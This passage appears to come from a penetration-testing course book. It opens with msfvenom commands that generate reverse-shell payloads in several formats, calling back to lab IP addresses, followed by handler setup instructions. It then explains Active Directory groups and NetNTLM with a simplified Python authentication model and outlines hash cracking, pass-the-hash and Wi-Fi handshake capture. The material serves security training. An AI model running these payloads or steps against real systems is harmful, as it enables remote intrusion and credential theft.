msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php

Other Payloads:

Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

After that, start Metasploit (msfconsole), run "use exploit/multi/handler", set LHOST,
LPORT and payload to match the generated payload, and then run exploit (or run).

Chapter 15
Active Directory
A Windows domain is a group of users and computers. It centralises the administration
of common components of a Windows computer network in a single repository called
Active Directory (AD). The server that runs the Active Directory services is known as a
Domain Controller (DC).
Users
Machines: PC$

Security Group | Description
Domain Admins | Users of this group have administrative privileges over the entire domain. By default, they can administer any computer on the domain, including the DCs.
Server Operators | Users in this group can administer Domain Controllers. They cannot change any administrative group memberships.
Backup Operators | Users in this group are allowed to access any file, ignoring their permissions. They are used to perform backups of data on computers.
Account Operators | Users in this group can create or modify other accounts in the domain.
Domain Users | Includes all existing user accounts in the domain.
Domain Computers | Includes all existing computers in the domain.
Domain Controllers | Includes all existing DCs on the domain.

When using Windows domains, all credentials are stored on the Domain Controllers.
Whenever a user tries to authenticate to a service using domain credentials, the service
will need to ask the Domain Controller to verify that they are correct. Two protocols can
be used for network authentication in Windows domains:
- Kerberos: Used by any recent version of Windows. This is the default protocol in
any recent domain.
- NetNTLM: Legacy authentication protocol kept for compatibility purposes.
Kerberos Authentication: Kerberos authentication is the default authentication
protocol for any recent version of Windows.
NetNTLM Authentication: NetNTLM works using a challenge-response mechanism.
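The challenge-response idea behind NetNTLM can be shown end to end with the three parties the text names: client, service and Domain Controller. The code below is an added, deliberately simplified model (not the course's code and not the real NetNTLM algorithm, which uses an MD4 password hash and HMAC-MD5): it uses SHA-256 and HMAC-SHA256 in the same roles. It shows that the password itself never crosses the wire, that only the DC holding the stored secret can verify an answer, and that a captured response is useless against a fresh challenge. All user names, passwords and challenge values are constructed.

```python
import hashlib
import hmac
import os


def credential_secret(password):
    """Stand-in for the stored credential: derived from the password, never the password.
    (Real NetNTLM derives an MD4 'NT hash'; SHA-256 is used here only for illustration.)"""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


class DomainController:
    """Holds every user's credential secret; the only party able to verify a response."""

    def __init__(self):
        self.secrets = {}

    def add_user(self, user, password):
        self.secrets[user] = credential_secret(password)

    def verify(self, user, challenge, response):
        secret = self.secrets.get(user)
        if secret is None:
            return False
        expected = hmac.new(secret, challenge, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)   # constant-time compare


class Service:
    """A domain-joined service: issues a fresh random challenge, forwards the answer to the DC."""

    def __init__(self, dc):
        self.dc = dc

    def new_challenge(self):
        return os.urandom(8)

    def login(self, user, challenge, response):
        return self.dc.verify(user, challenge, response)


class Client:
    def __init__(self, user, password):
        self.user = user
        self.secret = credential_secret(password)   # the client needs only the secret

    def respond(self, challenge):
        return hmac.new(self.secret, challenge, hashlib.sha256).digest()


def authenticate(client, service, challenge=None, replayed_response=None):
    """One exchange. A fixed challenge makes the demo reproducible; replayed_response
    models an attacker sending a previously captured answer against a new challenge."""
    challenge = challenge if challenge is not None else service.new_challenge()
    response = replayed_response if replayed_response is not None else client.respond(challenge)
    return service.login(client.user, challenge, response)


def demo():
    dc = DomainController()
    dc.add_user("alice", "correct horse")          # constructed account
    svc = Service(dc)
    good = Client("alice", "correct horse")
    bad = Client("alice", "wrong password")
    c1, c2 = b"\x01" * 8, b"\x02" * 8               # fixed challenges for the demo
    captured = good.respond(c1)                     # what a sniffer on the wire would see
    return {
        "valid": authenticate(good, svc, c1),
        "wrong_password": authenticate(bad, svc, c1),
        "replay_old_response": authenticate(good, svc, c2, replayed_response=captured),
    }


if __name__ == "__main__":
    print(demo())
```

The model also makes the weakness behind the course's later "pass the hash" step visible: the client answers with credential_secret alone, so whoever obtains that stored secret can authenticate without ever knowing the password. That is why protecting and rotating stored credential material, and preferring Kerberos, matters for defenders.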

Active Directory Attack

Enumeration:

Now enumerate the users.

Now crack the hash with hashcat.

Exploit:

This allows us to retrieve all of the password hashes.
Now we use Evil-WinRM to pass the hash.

Chapter 16
Wi-Fi Hacking
Change managed mode to monitor mode

Let's find the 3-way handshake

Change monitor mode back to managed mode

Chapter 17
Capture The Flag (CTF)
Basic Pentesting

Mr Robot

Blue

Juice Shop
